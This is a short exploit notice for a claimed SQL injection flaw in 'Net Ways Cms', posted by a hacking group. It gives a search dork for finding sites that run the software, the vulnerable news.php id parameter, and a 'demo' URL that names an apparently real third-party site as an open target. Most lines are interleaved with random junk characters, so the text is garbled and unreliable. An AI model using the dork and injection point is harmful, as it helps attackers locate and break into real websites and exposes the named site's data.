################################################################################??######## 6 u J8 p2 w+ H6 m
#
3 C' t0 M: r7 t( H) }1 K# Exploit Title : Net Ways Cms Sql Injection Vulnerability - u7 ~' C" `5 I. @! `- z! B9 `
#
6 Y- W8 g: Q% R# P- R7 m# Author : IrIsT.Ir
- S9 ]. j/ `. X) N2 x#
' z; s" s+ J9 R# |# Discovered By : Am!r
7 z& i! a: U. G#
. U+ U) ?/ Q6 ]- O# Home : http://IrIsT.Ir/forum ' {# a7 x. J- @, r) v# V* c
# $ h8 K9 M$ ^3 e7 d0 {) _8 f% S7 x2 Z
# Software Link : http://www.netways.com/ www.political-security.com
- E& y Y( E2 v& F& T# : u* o: A9 a6 t5 g
# Security Risk : High
& f1 [$ S" y1 J7 f% E% k+ F# ) p% w- _' X/ n6 {
# Version : All Version
. E: W- Y# W( x9 ~ x* ^0 o7 Z+ T#
; `: G( M; H9 N( e# [# Tested on : GNU/Linux Ubuntu - Windows Server - win7
: M- O) n4 w( p#
+ d* p v- x6 Y7 d# Dork : intext:"Designed & developed by NetWays" ; T0 S4 G9 o* |$ s5 D2 d' v
# / {; R/ c$ E% h$ P! N. T- m
################################################################################??########
+ ?- V' b+ E. ^' r! g# / A* V; P5 z- f2 q' u% U
# Expl0iTs :
+ b' Z4 D; a' t5 }) [) Y7 z#
0 c' [2 B0 P3 J8 \7 D x# http://target.com/news.php?id=[Sql]
+ a% z7 l' V4 p9 U5 }#
$ ]5 V2 [7 m6 g9 O#
5 |" G- x4 B, N, f# D3mo : 9 o% X9 B9 K4 |& @4 ]
#
1 a# F9 ]9 K- Q, N4 J# http://compagnieparento.com/news.php?id=7[Sql]
/ p7 G. i& K* Y0 J4 w$ {9 H# ( E. _5 D% S2 f0 K o
################################################################################??########
+ m8 M8 Z6 a: z ^, J# ! C9 P9 l& X6 l% Q& _. o
# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r & K0 v7 y6 _# g R6 N, x! _
# 5 D n! ^: T! p. A0 f# z
# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r ' c7 P5 R% s1 ?8 H! e8 c& H4 L
# 1 k# q! @5 @: @' o* K: {
# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum - B/ f& H% }& l! x
# : @1 Y& F) R9 T" {% e0 D: q& v
################################################################################??######## |